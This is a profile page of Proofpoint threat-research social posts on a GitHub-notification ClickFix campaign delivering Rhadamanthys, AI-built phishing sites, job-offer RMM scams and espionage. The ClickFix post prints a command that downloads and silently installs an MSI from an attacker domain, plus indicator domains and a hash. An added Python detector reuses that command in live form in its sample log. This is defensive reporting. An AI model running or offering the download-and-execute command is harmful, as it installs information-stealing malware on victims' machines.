Threat Insight

@threatinsight@infosec.exchange
1.3K Followers
1 Following
96 Posts
Proofpoint's insights on targeted attacks & the security landscape.
Threat Insight Blogs: https://www.proofpoint.com/us/blog/threat-insight
Threat Insight on X: https://twitter.com/threatinsight

Something #spicy is coming to the next Only Malware in the Building podcast—dropping September 2. 🌶️

Bookmark the show page and reserve your seat at the table 🪑 alongside @selenalarson, Dave Bittner and Keith Mularski.

🔥 You won't want to miss it! https://thecyberwire.com/podcasts/only-malware-in-the-building

#podcast #hotones

You asked, we answered. AI tools are significantly lowering the barrier to entry for cybercriminals.

Proofpoint recently observed threat actor campaigns leveraging the AI-generated website builder #Lovable to create and host credential #phishing, #malware, and #fraud websites.

Tens of thousands of Lovable URLs have been flagged by our team in email and SMS data since February 2025.

See our blog to see all the campaign details and learn how automatic, AI-powered, web creation tools are affecting the threat landscape. https://brnw.ch/21wV3DD

#LovableAI #webapp #webbuilder #impersonation

Proofpoint identified a unique attack chain leveraging GitHub notifications to deliver #Rhadamanthys.

We first spotted this post by @anyrun_app about ClickFix delivering Rhadamanthys and began investigating. https://infosec.exchange/@anyrun_app/115019769476243964

We identified GitHub notification emails that kick off the attack chain. The emails are likely generated by the threat actor creating an issue in an actor-controlled repository with a fake security warning, and then tagging legitimate accounts who receive notifications that they have been tagged, with the text from the issue.

The notifications contain shortened URLs that will lead to an actor-controlled website. The website will perform filtering functions, and if those checks are passed, the visitor will be redirected to a website that presents a fake GitHub-branded CAPTCHA instructing users to verify they are human.

Following the instructions will initiate a command that downloads and executes malware.

The specific malware may vary throughout the campaign.

At the time of analysis, the ClickFix Payload URL has led to the Rhadamanthys malware.

Notably, this chain uses CoreSecThree infrastructure, previously only observed to be used on compromised websites as an inject.

CoreSecThree is a delivery framework leveraged for filtering and enabling ClickFix campaigns to distribute malware, typically information stealers.

CoreSecThree is likely operated by a single threat actor. Proofpoint assesses with medium confidence that both the campaigns via compromised websites and this GitHub campaign are performed by the same threat actor.

Example ClickFix command: msiexec /i hxxps:///temopix[.]com /qn

Example of MSI: shields.msi | File Size: 10981376 Byte(s) (10,47 MB) | SHA256: 4c9df28e6b802ebe9e40f8fe34d2014b1fe524c64f7c8bd013f163c4daa794b2

Example system commands:

C:\Users\<username>\AppData\Local\Programs\MediaHuman Lyrics Finder Free\LdVBoxSVC.exe LdVBoxSVC.exe

Bitly redirect: hxxps://gitsecguards[.]com

ClickFix Landing domain: security[.]flaxergaurds[.]com

Organizations are encouraged to restrict PowerShell to only approved administrative users.
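A process-log check for the ClickFix command pattern described above (msiexec asked to install a package from an HTTP(S) URL with the quiet switch), added here as a defender example rather than Proofpoint's own tooling; the pipe-delimited log format and the sample records are constructed, with the temopix domain taken from the post and refanged.

```python
"""Flag ClickFix-style remote MSI installs in process-creation logs.
Added example, not Proofpoint tooling; log format and samples are constructed."""
import shlex
from urllib.parse import urlparse

INSTALL_SWITCHES = {"/i", "-i", "/package", "-package"}  # msiexec install switches
QUIET_SWITCHES = {"/qn", "-qn", "/quiet", "-quiet"}       # no-UI switches
REMOTE_SCHEMES = {"http", "https"}


def parse_msiexec(cmdline):
    """Return (package, quiet) for an msiexec install command, else None."""
    try:
        argv = [a.strip('"') for a in shlex.split(cmdline, posix=False)]
    except ValueError:
        return None
    if not argv or argv[0].lower().rsplit("\\", 1)[-1] not in ("msiexec", "msiexec.exe"):
        return None
    package, quiet = None, False
    for i, tok in enumerate(argv[1:], start=1):
        low = tok.lower()
        if low in INSTALL_SWITCHES and i + 1 < len(argv):
            package = argv[i + 1]          # the token after /i is the package
        elif low in QUIET_SWITCHES:
            quiet = True
    return (package, quiet) if package else None


def is_remote_msi_install(cmdline):
    """True when msiexec is told to install a package fetched over HTTP(S)."""
    parsed = parse_msiexec(cmdline)
    return bool(parsed) and urlparse(parsed[0]).scheme.lower() in REMOTE_SCHEMES


def scan_process_log(lines):
    """Return findings for 'time|parent_image|command_line' records."""
    findings = []
    for line in lines:
        time, parent, cmdline = line.split("|", 2)
        if not is_remote_msi_install(cmdline):
            continue
        package, quiet = parse_msiexec(cmdline)
        findings.append({
            "time": time,
            "host": urlparse(package).hostname,
            "quiet": quiet,
            # explorer.exe as parent is what a paste into the Run dialog looks like
            "from_run_dialog": parent.lower().endswith("explorer.exe"),
        })
    return findings


# Constructed sample records; temopix.com is the domain reported in the post, refanged.
SAMPLE_LOG = [
    "2025-08-20T10:01:02Z|C:\\Windows\\explorer.exe|msiexec /i https://temopix.com /qn",
    "2025-08-20T10:05:00Z|C:\\Windows\\System32\\cmd.exe|msiexec.exe /i C:\\pkgs\\vendor.msi /qn",
    "2025-08-20T10:07:33Z|C:\\Windows\\explorer.exe|notepad.exe C:\\notes.txt",
    '2025-08-20T10:09:10Z|C:\\Windows\\explorer.exe|"C:\\Windows\\System32\\msiexec.exe" /package http://cdn.example.invalid/shields.msi /quiet',
]

if __name__ == "__main__":
    for finding in scan_process_log(SAMPLE_LOG):
        print(finding)
```

Local MSI installs and non-msiexec processes are ignored; only the two records that fetch a package over HTTP(S) are reported, each tagged with whether the parent looks like the Run dialog.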

Proofpoint threat researchers have uncovered a way to sidestep FIDO-based authentication, a protection method used to block credential phishing and account takeover (ATO).

Blog: https://www.proofpoint.com/us/blog/threat-insight/dont-phish-let-me-down-fido-authentication-downgrade

While the tactic has not yet been observed in the wild, the discovery is a significant emerging threat and exposes targets to adversary-in-the-middle (AiTM) threats.

Read our blog to understand how this potential threat questions the reliability of FIDO (Fast Identity Online) passkey implementations, an authentication method currently viewed as robust for verifying user identities and recommended for improving online security.

#FIDO #authentication #ATO #MFA

Don’t Phish-let Me Down: FIDO Authentication Downgrade | Proofpoint US

Key takeaways: FIDO-based passkeys remain a highly recommended authentication method to protect against prevalent credential phishing and account takeover (ATO) threats.

In a new technical blog, Proofpoint threat researchers detailed their observations of threat actors impersonating well-known enterprises with fake #Microsoft #OAuth applications that redirect to malicious URLs, enabling credential phishing.

See our blog for full campaign details and impersonation examples. We also included tips on how to defend against hybrid (email and cloud) threats. https://www.proofpoint.com/us/blog/threat-insight/microsoft-oauth-app-impersonation-campaign-leads-mfa-phishing

Every threat actor group has its own unique tactics, techniques, and procedures (TTPs). For example, during #taxseason, #TA558 pivots from its typical reservation-themed email lures to target financial firms with tax-related lures.

#TA2541 is known to consistently target organizations in the aerospace, manufacturing, and defense industries using remote access trojans (RATs).

#TA582's TTPs feel like a digital jigsaw puzzle, with simultaneous email, web inject, and compromised site vectors.

Stream this DISCARDED podcast episode to hear all about the chaotic brilliance of mid-tier eCrime actors. https://www.proofpoint.com/us/podcasts/discarded#143240

🚨 Job Seekers, watch out! 🚨 Proofpoint researchers have observed multiple email campaigns impersonating job interview invites from real companies and recruiters.

These emails claim to offer opportunities via Zoom or Teams, but instead lead recipients to install remote management tools (RMM) like SimpleHelp, ScreenConnect, or Atera.

Here's what you need to know:

💻 What’s the threat?
While RMM tools are used legitimately by IT teams, in the hands of cybercriminals, they function like remote access trojans (RATs)—granting attackers full access to your computer, data, and finances.

📬 In one case, a hacked LinkedIn account posted a real job description but swapped in a malicious Gmail address. Proofpoint later discovered this address being used to send fake interview invites to job seekers who had applied.

🔍 How are they doing it?

Threat actors may:

• Create fake job listings to harvest emails
• Hack recruiter inboxes or LinkedIn accounts
• Use lists of stolen email addresses

🎯 This trend is part of a broader wave of cyberattacks where RMM/RAS (remote access software) is used as the initial payload—blending in with normal traffic before launching further attacks like data theft or ransomware.

⚠️ If you're job hunting, stay alert:

• Double-check email sender names and domains
• Be wary of .exe files or suspicious URLs
• If something feels off, trust your instinct

Read more from our threat research team on threats using RMM tools: https://www.proofpoint.com/us/blog/threat-insight/remote-monitoring-and-management-rmm-tooling-increasingly-attackers-first-choice

#OpenToWork #JobSearch #JobScam #RMM

Remote Monitoring and Management (RMM) Tooling Increasingly an Attacker’s First Choice | Proofpoint US

Key findings: More threat actors are using legitimate remote monitoring and management (RMM) tools as a first-stage payload in email campaigns. RMMs can be used for

Proofpoint threat researchers released new details on a widespread Request for Quote (RFQ) scam that involves leveraging common Net financing options to steal a variety of high value electronics and goods.

To understand how the scam works, our researchers posed as suppliers with lax finance departments and engaged directly with threat actors.

Step into the mind of a cybercriminal and read all about the anatomy of the scam in this blog: https://www.proofpoint.com/us/blog/threat-insight/net-rfq-request-quote-scammers-casting-wide-net-steal-real-goods

#shipment #RFQ #finance #scam

New Proofpoint threat research revealed an increase in China-aligned cyber #espionage targeting Taiwan’s #semiconductor industry—a sector critical to the global tech #supplychain.

At least 3️⃣ distinct China-aligned threat actors are behind the efforts.

These campaigns likely reflect China’s strategic push for semiconductor self-sufficiency amid tightening US and Taiwanese #export controls.

See this new blog for a breakdown of the tactics, tools, and implications: https://www.proofpoint.com/us/blog/threat-insight/phish-china-aligned-espionage-actors-ramp-up-taiwan-semiconductor-targeting

Phish and Chips: China-Aligned Espionage Actors Ramp Up Taiwan Semiconductor Industry Targeting  | Proofpoint US

Key findings: Between March and June 2025, Proofpoint Threat Research observed three Chinese state-sponsored threat actors conduct targeted phishing campaigns against the Taiwanese

Espionage 🤝 Cybercrime :: TA829 🤝 UNK_GreenSec

Our extensive visibility into the threat landscape has led us to conclude that there is very likely a link between TA829 (a cybercriminal actor also conducting #espionage in line with Russian state interests) & UNK_GreenSec (a #cybercriminal cluster observed deploying #malware and #ransomware).

See our research blog for a technical analysis of the intriguing overlap between the threat actor clusters. https://brnw.ch/21wTN3n

10 Things I Hate About Attribution: RomCom vs. TransferLoader | Proofpoint US

Threat Research would like to acknowledge and thank the Paranoids, Spur, and Pim Trouerbach for their collaboration to identify, track, and disrupt this activity. Key takeaways